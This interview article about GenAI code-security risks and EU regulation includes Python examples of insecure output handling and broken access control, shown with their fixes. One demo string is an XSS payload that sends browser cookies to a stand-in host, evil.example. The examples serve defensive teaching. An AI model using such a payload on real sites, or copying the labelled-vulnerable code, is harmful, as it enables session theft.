
In an exclusive interview with Cyber Intelligence, Gadi Bashvitz, CEO of cybersecurity testing firm Bright Security, warns of the security challenges facing organizations in the wake of the widespread adoption of GenAI.
Cyber Intelligence: Are there any specific dangers of which companies using GenAI to generate new code should be particularly aware?
Gadi Bashvitz: There are multiple considerations here. On one hand, any solution built on LLMs is prone to LLM-specific vulnerabilities such as Insecure Output Handling and Broken Access Control, so it is critical that organizations are aware of these classes of flaws and can detect them before releasing LLM-based solutions. On the other hand, organizations leveraging GenAI code-generation tools face a very different risk. The underlying problem is that AI code-generation technologies are trained on a great deal of open-source code. That open-source content is full of security holes that are easy for bad actors to exploit, and the AI-generated code inherits the same issues; AI-generated code has four times more vulnerabilities than human-generated code. Organizations need to identify the cybersecurity gaps left by GenAI by using vulnerability-testing and remediation solutions.
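To make the first category concrete, here is a minimal Python sketch of Insecure Output Handling; the rendering functions and the scenario are illustrative assumptions, not Bright Security's code. The vulnerable version treats LLM output as trusted and interpolates it straight into HTML, so a prompt-injected response can carry a script into every visitor's browser; the fix treats model output like any other untrusted input and escapes it before it reaches an interpreter.

```python
import html

def render_summary_unsafe(llm_output: str) -> str:
    # VULNERABLE: LLM output is interpolated directly into HTML.
    # A prompt-injected response containing <script>...</script>
    # executes in every visitor's browser (stored XSS).
    return f"<div class='summary'>{llm_output}</div>"

def render_summary_safe(llm_output: str) -> str:
    # Treat model output as untrusted user input: escape it before
    # it reaches any interpreter (HTML here; same idea for SQL, shell).
    return f"<div class='summary'>{html.escape(llm_output)}</div>"

if __name__ == "__main__":
    malicious = 'Great product! <script>fetch("https://evil.example/c?"+document.cookie)</script>'
    print(render_summary_unsafe(malicious))  # script tag survives intact
    print(render_summary_safe(malicious))    # rendered inert as &lt;script&gt;...
```

The same principle applies wherever LLM output flows into SQL queries, shell commands, or templates.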
Cyber Intelligence: How urgent a priority is this?
Gadi Bashvitz: Deploying GenAI-based software without being aware of, testing, and remediating the vulnerabilities it could introduce is like installing a very sophisticated alarm system and never arming it: you might be giving away the keys to the kingdom. If, for example, an organization is going to launch a new product, it is essential to address potential and already-existing vulnerabilities at the pre-production stage. If, on the other hand, the product is already in post-production or launched, vulnerability assessment of AI-generated code is even more urgent. Companies also need to examine precisely what role GenAI may have played in the development of their application programming interfaces (APIs), the rules and protocols that allow different software applications to communicate with each other. Failing to do so could result in significant exposure to data breaches, a raft of lawsuits, and some very hefty future fines.
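As an illustration of the kind of API flaw such a review should catch, below is a hypothetical sketch (the invoice store and endpoint names are assumptions for illustration) of broken object-level authorization, the Broken Access Control variant that generated endpoint code most often omits: the handler fetches a record by ID without ever checking that the caller owns it.

```python
from dataclasses import dataclass

@dataclass
class Invoice:
    invoice_id: int
    owner_id: int
    amount: float

# Toy in-memory store standing in for a database.
INVOICES = {
    1: Invoice(invoice_id=1, owner_id=100, amount=250.0),
    2: Invoice(invoice_id=2, owner_id=200, amount=990.0),
}

def get_invoice_unsafe(invoice_id: int) -> Invoice:
    # VULNERABLE: any caller who can guess an ID can read
    # any customer's invoice (broken object-level authorization).
    return INVOICES[invoice_id]

def get_invoice_safe(invoice_id: int, caller_id: int) -> Invoice:
    # The ownership check is exactly the line generated code tends to skip.
    invoice = INVOICES[invoice_id]
    if invoice.owner_id != caller_id:
        raise PermissionError("caller does not own this invoice")
    return invoice

if __name__ == "__main__":
    print(get_invoice_unsafe(2))               # leaks another user's data
    print(get_invoice_safe(1, caller_id=100))  # allowed: caller owns invoice 1
    # get_invoice_safe(2, caller_id=100) would raise PermissionError
```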
Cyber Intelligence: So what can organizations that may have adopted AI quickly do in order to comply with this fresh barrage of security directives relating to the adoption of GenAI?
Gadi Bashvitz: There are a number of steps organizations can take to improve their security posture. As they adopt GenAI tools or use GenAI to speed up coding, they need to build security into those processes and make sure they can identify vulnerabilities before code is deployed to production, where it can be exploited by the rapidly growing number of bad actors worldwide. These may be financially motivated international gangs of cybercriminals or, increasingly, nation-state-backed actors intent on espionage and sabotage. Once the vulnerabilities are identified, they need to be effectively remediated and the fix validated, for example with a regression test such as the one sketched below.
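One way to make "the fix validated" concrete is an automated regression test that replays the original exploit payload against the patched code, so the vulnerability cannot quietly return. A minimal sketch, reusing the hypothetical escaping fix from the earlier example (an assumption for illustration, not Bright Security's tooling):

```python
import html
import unittest

def render_summary(llm_output: str) -> str:
    # Patched version of the hypothetical renderer: escapes before rendering.
    return f"<div class='summary'>{html.escape(llm_output)}</div>"

class TestInsecureOutputHandlingFix(unittest.TestCase):
    # Replay the original exploit payload so the fix cannot regress silently.
    PAYLOAD = "<script>alert(1)</script>"

    def test_script_tag_is_neutralized(self):
        rendered = render_summary(self.PAYLOAD)
        self.assertNotIn("<script>", rendered)       # raw tag must not survive
        self.assertIn("&lt;script&gt;", rendered)    # it must be escaped, not dropped

if __name__ == "__main__":
    unittest.main()
```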
Cyber Intelligence: Exactly how and when is international regulation relating to GenAI going to impact organizations in, for instance, the US?
Gadi Bashvitz: As of January 17, financial entities operating in the EU, together with the ICT providers that serve them, are obliged to comply with the EU’s new Digital Operational Resilience Act (DORA). DORA aims to strengthen the IT security of entities like banks, insurance companies, and investment firms, and companies that do not plug security gaps created by GenAI could face severe penalties. For example, DORA imposes strict security-by-design principles that GenAI is not yet capable of adhering to. It also touches on intellectual property rights in any product or service, something GenAI is notorious for disregarding.
Cyber Intelligence: In addition to DORA in January, is there any other international regulation about to impact organizations that may have recently begun to adopt GenAI?
Gadi Bashvitz: The EU ban on AI systems that pose an unacceptable risk also comes into force in February. The AI Act clearly sets out a list of prohibited AI practices that pose an “unacceptable risk” to EU citizens’ safety or that are intrusive or discriminatory. This could create potential pitfalls for organizations that have already integrated GenAI. Very recently, on December 16, 2024, the US National Cybersecurity Center of Excellence (NCCoE) also released a Draft NIST Internal Report (IR), which calls for a structured, risk-based approach to managing cybersecurity.
Cyber Intelligence: Thank you.